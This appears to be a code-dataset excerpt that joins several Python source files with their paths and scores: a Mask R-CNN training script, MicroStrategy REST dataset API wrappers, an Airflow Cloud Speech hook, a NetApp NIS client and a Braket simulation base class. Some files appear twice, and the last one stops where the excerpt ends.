init_with = "coco" # imagenet, coco, or last
if init_with == "imagenet":
model.load_weights(model.get_imagenet_weights(), by_name=True)
elif init_with == "coco":
# Load weights trained on MS COCO, but skip layers that
# are different due to the different number of classes
# See README for instructions to download the COCO weights
model.load_weights(COCO_MODEL_PATH, by_name=True,
exclude=["mrcnn_class_logits", "mrcnn_bbox_fc",
"mrcnn_bbox", "mrcnn_mask"])
elif init_with == "last":
# Load the last model you trained and continue training
model.load_weights(model.find_last()[1], by_name=True)
# Train the head branches
# Passing layers="heads" freezes all layers except the head
# layers. You can also pass a regular expression to select
# which layers to train by name pattern.
dataset_train = NOCSDataset(synset_names, 'train', config)
dataset_train.load_camera_scenes(camera_dir)
dataset_train.load_real_scenes(real_dir)
dataset_train.load_coco(coco_dir, "train", class_names=class_map.keys())
dataset_train.prepare(class_map)
# Validation dataset
dataset_val = NOCSDataset(synset_names, 'val', config)
dataset_val.load_camera_scenes(camera_dir)
dataset_val.prepare(class_map)
#print("Training network heads")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE,
epochs=100,
layers_name='heads')
# Training - Stage 2
# Finetune layers from ResNet stage 4 and up
print("Training Resnet layer 4+")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE/10,
epochs=130,
layers_name='4+')
# Training - Stage 3
# Finetune layers from ResNet stage 3 and up
print("Training Resnet layer 3+")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE/100,
epochs=400,
layers_name='all') | 0.365796 | 0.301264 |
import requests
def dataset_definition(connection, dataset_id, fields=None, verbose=False):
"""Get the definition of a dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
fields(list, optional): Specifies object types to be returned. Possible values include tables, columns,
attributes, and metrics. If no value is set, attributes and metrics are returned.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.get(url=connection.base_url + '/datasets/' + dataset_id,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
params={'fields': fields},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def create_dataset(connection, body, verbose=False):
"""Create a single-table dataset from external data uploaded to the MicroStrategy Intelligence Server.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
body (str): JSON-formatted definition of the dataset. Generated by `utils.formjson()`.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def update_dataset(connection, dataset_id, table_name, update_policy, body, verbose=False, table_id=None):
"""Update a single-table dataset with external data uploaded to the MicroStrategy Intelligence Server.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
table_id (str): Identifier of the table to update within the MicroStrategy dataset.
update_policy (str): Update operation type: 'Add' (inserts new, unique rows), 'Update' (updates data in
existing rows and columns), 'Upsert' (updates existing data and inserts new rows), 'Replace' (similar to
truncate, replaces the existing data with new data).
body (str): JSON-formatted definition of the dataset. Generated by `utils.formjson()`.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.patch(url=connection.base_url + '/datasets/' + dataset_id + '/tables/' + table_name,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id,
'updatePolicy': update_policy},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def delete_dataset(connection, dataset_id, verbose=False):
"""Delete a dataset previously created using the REST API.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.delete(url=connection.base_url + '/objects/' + dataset_id + '?type=3',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies, verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def create_multitable_dataset(connection, body, verbose=False):
"""Create the definition of a multi-table dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
body (dict): JSON-formatted payload containing the body of the request.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets/models',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def upload_session(connection, dataset_id, body, verbose=False):
"""Create a multi-table dataset upload session.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
body (dict): JSON-formatted payload containing the body of the request.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def upload(connection, dataset_id, session_id, body, verbose=False):
"""Upload data to a multi-table dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
session_id (str): Identifer of the server session used for collecting uploaded data.
body (dict): JSON-formatted payload containing the body of the request.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.put(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def publish(connection, dataset_id, session_id, verbose=False):
"""Publish a multi-table dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
session_id (str): Identifer for the server session used for collecting uploaded data.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id + '/publish',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def publish_status(connection, dataset_id, session_id, verbose=False):
"""Get multi-table dataset publication status.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
session_id (str): Identifer for the server session used for collecting uploaded data.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.get(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id + '/publishStatus',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def publish_cancel(connection, dataset_id, session_id, verbose=False):
"""Delete a multi-table dataset upload session and cancel publication.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
session_id (str): Identifer for the server session used for collecting uploaded data.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.delete(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response | mstrio/api/datasets.py | import requests
def dataset_definition(connection, dataset_id, fields=None, verbose=False):
"""Get the definition of a dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
fields(list, optional): Specifies object types to be returned. Possible values include tables, columns,
attributes, and metrics. If no value is set, attributes and metrics are returned.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.get(url=connection.base_url + '/datasets/' + dataset_id,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
params={'fields': fields},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def create_dataset(connection, body, verbose=False):
"""Create a single-table dataset from external data uploaded to the MicroStrategy Intelligence Server.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
body (str): JSON-formatted definition of the dataset. Generated by `utils.formjson()`.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def update_dataset(connection, dataset_id, table_name, update_policy, body, verbose=False, table_id=None):
"""Update a single-table dataset with external data uploaded to the MicroStrategy Intelligence Server.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
table_id (str): Identifier of the table to update within the MicroStrategy dataset.
update_policy (str): Update operation type: 'Add' (inserts new, unique rows), 'Update' (updates data in
existing rows and columns), 'Upsert' (updates existing data and inserts new rows), 'Replace' (similar to
truncate, replaces the existing data with new data).
body (str): JSON-formatted definition of the dataset. Generated by `utils.formjson()`.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.patch(url=connection.base_url + '/datasets/' + dataset_id + '/tables/' + table_name,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id,
'updatePolicy': update_policy},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def delete_dataset(connection, dataset_id, verbose=False):
"""Delete a dataset previously created using the REST API.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.delete(url=connection.base_url + '/objects/' + dataset_id + '?type=3',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies, verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def create_multitable_dataset(connection, body, verbose=False):
"""Create the definition of a multi-table dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
body (dict): JSON-formatted payload containing the body of the request.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets/models',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def upload_session(connection, dataset_id, body, verbose=False):
"""Create a multi-table dataset upload session.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
body (dict): JSON-formatted payload containing the body of the request.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def upload(connection, dataset_id, session_id, body, verbose=False):
"""Upload data to a multi-table dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
session_id (str): Identifer of the server session used for collecting uploaded data.
body (dict): JSON-formatted payload containing the body of the request.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.put(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def publish(connection, dataset_id, session_id, verbose=False):
"""Publish a multi-table dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
session_id (str): Identifer for the server session used for collecting uploaded data.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id + '/publish',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def publish_status(connection, dataset_id, session_id, verbose=False):
"""Get multi-table dataset publication status.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
session_id (str): Identifer for the server session used for collecting uploaded data.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.get(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id + '/publishStatus',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def publish_cancel(connection, dataset_id, session_id, verbose=False):
"""Delete a multi-table dataset upload session and cancel publication.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
session_id (str): Identifer for the server session used for collecting uploaded data.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.delete(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response | 0.856558 | 0.375907 |
"""This module contains a Google Cloud Speech Hook."""
from typing import Dict, Optional, Sequence, Union
from google.api_core.retry import Retry
from google.cloud.speech_v1 import SpeechClient
from google.cloud.speech_v1.types import RecognitionAudio, RecognitionConfig
from airflow.providers.google.common.consts import CLIENT_INFO
from airflow.providers.google.common.hooks.base_google import GoogleBaseHook
class CloudSpeechToTextHook(GoogleBaseHook):
"""
Hook for Google Cloud Speech API.
:param gcp_conn_id: The connection ID to use when fetching connection info.
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account.
"""
def __init__(
self,
gcp_conn_id: str = "google_cloud_default",
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
) -> None:
super().__init__(
gcp_conn_id=gcp_conn_id,
delegate_to=delegate_to,
impersonation_chain=impersonation_chain,
)
self._client = None
def get_conn(self) -> SpeechClient:
"""
Retrieves connection to Cloud Speech.
:return: Google Cloud Speech client object.
:rtype: google.cloud.speech_v1.SpeechClient
"""
if not self._client:
self._client = SpeechClient(credentials=self._get_credentials(), client_info=CLIENT_INFO)
return self._client
@GoogleBaseHook.quota_retry()
def recognize_speech(
self,
config: Union[Dict, RecognitionConfig],
audio: Union[Dict, RecognitionAudio],
retry: Optional[Retry] = None,
timeout: Optional[float] = None,
):
"""
Recognizes audio input
:param config: information to the recognizer that specifies how to process the request.
https://googleapis.github.io/google-cloud-python/latest/speech/gapic/v1/types.html#google.cloud.speech_v1.types.RecognitionConfig
:param audio: audio data to be recognized
https://googleapis.github.io/google-cloud-python/latest/speech/gapic/v1/types.html#google.cloud.speech_v1.types.RecognitionAudio
:param retry: (Optional) A retry object used to retry requests. If None is specified,
requests will not be retried.
:param timeout: (Optional) The amount of time, in seconds, to wait for the request to complete.
Note that if retry is specified, the timeout applies to each individual attempt.
"""
client = self.get_conn()
response = client.recognize(config=config, audio=audio, retry=retry, timeout=timeout)
self.log.info("Recognised speech: %s", response)
return response | airflow/providers/google/cloud/hooks/speech_to_text.py | """This module contains a Google Cloud Speech Hook."""
from typing import Dict, Optional, Sequence, Union
from google.api_core.retry import Retry
from google.cloud.speech_v1 import SpeechClient
from google.cloud.speech_v1.types import RecognitionAudio, RecognitionConfig
from airflow.providers.google.common.consts import CLIENT_INFO
from airflow.providers.google.common.hooks.base_google import GoogleBaseHook
class CloudSpeechToTextHook(GoogleBaseHook):
"""
Hook for Google Cloud Speech API.
:param gcp_conn_id: The connection ID to use when fetching connection info.
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account.
"""
def __init__(
self,
gcp_conn_id: str = "google_cloud_default",
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
) -> None:
super().__init__(
gcp_conn_id=gcp_conn_id,
delegate_to=delegate_to,
impersonation_chain=impersonation_chain,
)
self._client = None
def get_conn(self) -> SpeechClient:
"""
Retrieves connection to Cloud Speech.
:return: Google Cloud Speech client object.
:rtype: google.cloud.speech_v1.SpeechClient
"""
if not self._client:
self._client = SpeechClient(credentials=self._get_credentials(), client_info=CLIENT_INFO)
return self._client
@GoogleBaseHook.quota_retry()
def recognize_speech(
self,
config: Union[Dict, RecognitionConfig],
audio: Union[Dict, RecognitionAudio],
retry: Optional[Retry] = None,
timeout: Optional[float] = None,
):
"""
Recognizes audio input
:param config: information to the recognizer that specifies how to process the request.
https://googleapis.github.io/google-cloud-python/latest/speech/gapic/v1/types.html#google.cloud.speech_v1.types.RecognitionConfig
:param audio: audio data to be recognized
https://googleapis.github.io/google-cloud-python/latest/speech/gapic/v1/types.html#google.cloud.speech_v1.types.RecognitionAudio
:param retry: (Optional) A retry object used to retry requests. If None is specified,
requests will not be retried.
:param timeout: (Optional) The amount of time, in seconds, to wait for the request to complete.
Note that if retry is specified, the timeout applies to each individual attempt.
"""
client = self.get_conn()
response = client.recognize(config=config, audio=audio, retry=retry, timeout=timeout)
self.log.info("Recognised speech: %s", response)
return response | 0.952431 | 0.42471 |
from netapp.connection import NaConnection
from nis_get_iter_key_td import NisGetIterKeyTd # 2 properties
from nis_domain_config_info import NisDomainConfigInfo # 4 properties
class NisConnection(NaConnection):
def nis_get(self, nis_domain, desired_attributes=None):
"""
Get NIS domain configuration.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
:param desired_attributes: Specify the attributes that should be returned.
If not present, all attributes for which information is available
will be returned.
If present, only the desired attributes for which information is
available will be returned.
"""
return self.request( "nis-get", {
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
'desired_attributes': [ desired_attributes, 'desired-attributes', [ NisDomainConfigInfo, 'None' ], False ],
}, {
'attributes': [ NisDomainConfigInfo, False ],
} )
def nis_destroy(self, nis_domain):
"""
Destroy an existing NIS configuration.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
"""
return self.request( "nis-destroy", {
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
}, {
} )
def nis_modify(self, nis_domain, is_active=None, nis_servers=None):
"""
Modify the attributes of NIS configuration.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
:param is_active: Specifies whether the NIS domain configuration is active or
inactive.
:param nis_servers: Specifies the IP address of one or more NIS servers in the
domain.
"""
return self.request( "nis-modify", {
'is_active': [ is_active, 'is-active', [ bool, 'None' ], False ],
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
'nis_servers': [ nis_servers, 'nis-servers', [ basestring, 'ip-address' ], True ],
}, {
} )
def nis_create(self, is_active, nis_domain, nis_servers, return_record=None):
"""
Create an NIS domain configuration.
Multiple NIS domains can be configured on a single Vserver, but
only one NIS domain can be active at any given time.
:param is_active: Specifies whether the NIS domain configuration is active or
inactive.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
:param nis_servers: Specifies the IP address of one or more NIS servers in the
domain.
:param return_record: If set to true, returns the NIS domain configuration on
successful creation.
Default: false
"""
return self.request( "nis-create", {
'is_active': [ is_active, 'is-active', [ bool, 'None' ], False ],
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
'nis_servers': [ nis_servers, 'nis-servers', [ basestring, 'ip-address' ], True ],
'return_record': [ return_record, 'return-record', [ bool, 'None' ], False ],
}, {
'result': [ NisDomainConfigInfo, False ],
} )
def nis_get_iter(self, max_records=None, query=None, tag=None, desired_attributes=None):
"""
Iterate over a list of NIS configurations.
:param max_records: The maximum number of records to return in this call.
Default: 20
:param query: A query that specifies which objects to return.
A query could be specified on any number of attributes in the NIS
domain configuration object.
All NIS domain configuration objects matching this query up to
'max-records' will be returned.
:param tag: Specify the tag from the last call.
It is usually not specified for the first call. For subsequent
calls, copy values from the 'next-tag' obtained from the previous
call.
:param desired_attributes: Specify the attributes that should be returned.
If not present, all attributes for which information is available
will be returned.
If present, only the desired attributes for which information is
available will be returned.
"""
return self.request( "nis-get-iter", {
'max_records': max_records,
'query': [ query, 'query', [ NisDomainConfigInfo, 'None' ], False ],
'tag': tag,
'desired_attributes': [ desired_attributes, 'desired-attributes', [ NisDomainConfigInfo, 'None' ], False ],
}, {
'attributes-list': [ NisDomainConfigInfo, True ],
} ) | generated-libraries/python/netapp/nis/__init__.py | from netapp.connection import NaConnection
from nis_get_iter_key_td import NisGetIterKeyTd # 2 properties
from nis_domain_config_info import NisDomainConfigInfo # 4 properties
class NisConnection(NaConnection):
def nis_get(self, nis_domain, desired_attributes=None):
"""
Get NIS domain configuration.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
:param desired_attributes: Specify the attributes that should be returned.
If not present, all attributes for which information is available
will be returned.
If present, only the desired attributes for which information is
available will be returned.
"""
return self.request( "nis-get", {
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
'desired_attributes': [ desired_attributes, 'desired-attributes', [ NisDomainConfigInfo, 'None' ], False ],
}, {
'attributes': [ NisDomainConfigInfo, False ],
} )
def nis_destroy(self, nis_domain):
"""
Destroy an existing NIS configuration.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
"""
return self.request( "nis-destroy", {
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
}, {
} )
def nis_modify(self, nis_domain, is_active=None, nis_servers=None):
"""
Modify the attributes of NIS configuration.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
:param is_active: Specifies whether the NIS domain configuration is active or
inactive.
:param nis_servers: Specifies the IP address of one or more NIS servers in the
domain.
"""
return self.request( "nis-modify", {
'is_active': [ is_active, 'is-active', [ bool, 'None' ], False ],
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
'nis_servers': [ nis_servers, 'nis-servers', [ basestring, 'ip-address' ], True ],
}, {
} )
def nis_create(self, is_active, nis_domain, nis_servers, return_record=None):
"""
Create an NIS domain configuration.
Multiple NIS domains can be configured on a single Vserver, but
only one NIS domain can be active at any given time.
:param is_active: Specifies whether the NIS domain configuration is active or
inactive.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
:param nis_servers: Specifies the IP address of one or more NIS servers in the
domain.
:param return_record: If set to true, returns the NIS domain configuration on
successful creation.
Default: false
"""
return self.request( "nis-create", {
'is_active': [ is_active, 'is-active', [ bool, 'None' ], False ],
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
'nis_servers': [ nis_servers, 'nis-servers', [ basestring, 'ip-address' ], True ],
'return_record': [ return_record, 'return-record', [ bool, 'None' ], False ],
}, {
'result': [ NisDomainConfigInfo, False ],
} )
def nis_get_iter(self, max_records=None, query=None, tag=None, desired_attributes=None):
"""
Iterate over a list of NIS configurations.
:param max_records: The maximum number of records to return in this call.
Default: 20
:param query: A query that specifies which objects to return.
A query could be specified on any number of attributes in the NIS
domain configuration object.
All NIS domain configuration objects matching this query up to
'max-records' will be returned.
:param tag: Specify the tag from the last call.
It is usually not specified for the first call. For subsequent
calls, copy values from the 'next-tag' obtained from the previous
call.
:param desired_attributes: Specify the attributes that should be returned.
If not present, all attributes for which information is available
will be returned.
If present, only the desired attributes for which information is
available will be returned.
"""
return self.request( "nis-get-iter", {
'max_records': max_records,
'query': [ query, 'query', [ NisDomainConfigInfo, 'None' ], False ],
'tag': tag,
'desired_attributes': [ desired_attributes, 'desired-attributes', [ NisDomainConfigInfo, 'None' ], False ],
}, {
'attributes-list': [ NisDomainConfigInfo, True ],
} ) | 0.874064 | 0.390766 |
from typing import List
import numpy as np
from braket.default_simulator.operation import GateOperation, Observable
class Simulation:
"""
This class tracks the evolution of a quantum system with `qubit_count` qubits.
The state of system the evolves by application of `GateOperation`s using the `evolve()` method.
"""
def __init__(self, qubit_count: int, shots: int):
r"""
Args:
qubit_count (int): The number of qubits being simulated.
All the qubits start in the :math:`\ket{\mathbf{0}}` computational basis state.
shots (int): The number of samples to take from the simulation.
If set to 0, only results that do not require sampling, such as density matrix
or expectation, are generated.
"""
self._qubit_count = qubit_count
self._shots = shots
@property
def qubit_count(self) -> int:
"""int: The number of qubits being simulated by the simulation."""
return self._qubit_count
@property
def shots(self) -> int:
"""
int: The number of samples to take from the simulation.
0 means no samples are taken, and results that require sampling
to calculate cannot be returned.
"""
return self._shots
def evolve(self, operations: List[GateOperation]) -> None:
"""Evolves the state of the simulation under the action of
the specified gate operations.
Args:
operations (List[GateOperation]): Gate operations to apply for
evolving the state of the simulation.
Note:
This method mutates the state of the simulation.
"""
raise NotImplementedError("evolve has not been implemented.")
def expectation(self, observable: Observable) -> float:
"""The expected value of the observable in the given state.
Args:
observable (Observable): The observable to measure.
Returns:
float: The expected value of the observable.
"""
raise NotImplementedError("expectation has not been implemented.")
def retrieve_samples(self) -> List[int]:
"""Retrieves samples of states from the state of the simulation,
based on the probabilities.
Returns:
List[int]: List of states sampled according to their probabilities
in the state. Each integer represents the decimal encoding of the
corresponding computational basis state.
"""
raise NotImplementedError("retrieve_samples has not been implemented.")
@property
def probabilities(self) -> np.ndarray:
"""np.ndarray: The probabilities of each computational basis state."""
raise NotImplementedError("probabilities has not been implemented.") | src/braket/default_simulator/simulation.py |
from typing import List
import numpy as np
from braket.default_simulator.operation import GateOperation, Observable
class Simulation:
"""
This class tracks the evolution of a quantum system with `qubit_count` qubits.
The state of system the evolves by application of `GateOperation`s using the `evolve()` method.
"""
def __init__(self, qubit_count: int, shots: int):
r"""
Args:
qubit_count (int): The number of qubits being simulated.
All the qubits start in the :math:`\ket{\mathbf{0}}` computational basis state.
shots (int): The number of samples to take from the simulation.
If set to 0, only results that do not require sampling, such as density matrix
or expectation, are generated.
"""
self._qubit_count = qubit_count
self._shots = shots
@property
def qubit_count(self) -> int:
"""int: The number of qubits being simulated by the simulation."""
return self._qubit_count
@property
def shots(self) -> int:
"""
int: The number of samples to take from the simulation.
0 means no samples are taken, and results that require sampling
to calculate cannot be returned.
"""
return self._shots
def evolve(self, operations: List[GateOperation]) -> None:
"""Evolves the state of the simulation under the action of
the specified gate operations.
Args:
operations (List[GateOperation]): Gate operations to apply for
evolving the state of the simulation.
Note:
This method mutates the state of the simulation.
"""
raise NotImplementedError("evolve has not been implemented.")
def expectation(self, observable: Observable) -> float:
"""The expected value of the observable in the given state.
Args:
observable (Observable): The observable to measure.
Returns:
float: The expected value of the observable.
"""
raise NotImplementedError("expectation has not been implemented.")
def retrieve_samples(self) -> List[int]:
"""Retrieves samples of states from the state of the simulation,
based on the probabilities.
Returns:
List[int]: List of states sampled according to their probabilities
in the state. Each integer represents the decimal encoding of the
corresponding computational basis state.
"""
raise NotImplementedError("retrieve_samples has not been implemented.")
@property
def probabilities(self) -> np.ndarray:
"""np.ndarray: The probabilities of each computational basis state."""
